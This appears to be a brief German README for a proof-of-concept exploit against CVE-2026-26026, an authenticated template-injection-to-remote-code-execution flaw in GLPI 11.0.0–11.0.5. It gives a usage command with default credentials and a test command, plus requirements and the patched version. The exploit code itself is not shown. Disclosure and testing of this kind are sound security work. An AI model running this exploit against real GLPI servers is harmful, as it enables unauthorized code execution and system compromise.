
PoC-Skript für CVE-2026-26026 GLPI-Versionen 11.0.0 bis 11.0.5
Authentifizierter SSTI → RCE-Exploit für CVE-2026-26026 (GLPI 11.0.0–11.0.5).
Vollständiger Write-up: https://www.bzhunt.fr/blog/cve_glpi/
python3 POC_GLPI_Form_Dropdown_SSTI.py https://target.com \
-u glpi -p 'glpi' --cmd 'id'
Erfordert ein Konto mit dem Recht form CREATE (Super-Admin). Das Ziel muss GLPI ≤ 11.0.5 sein (gepatcht in 11.0.6).
pip install requests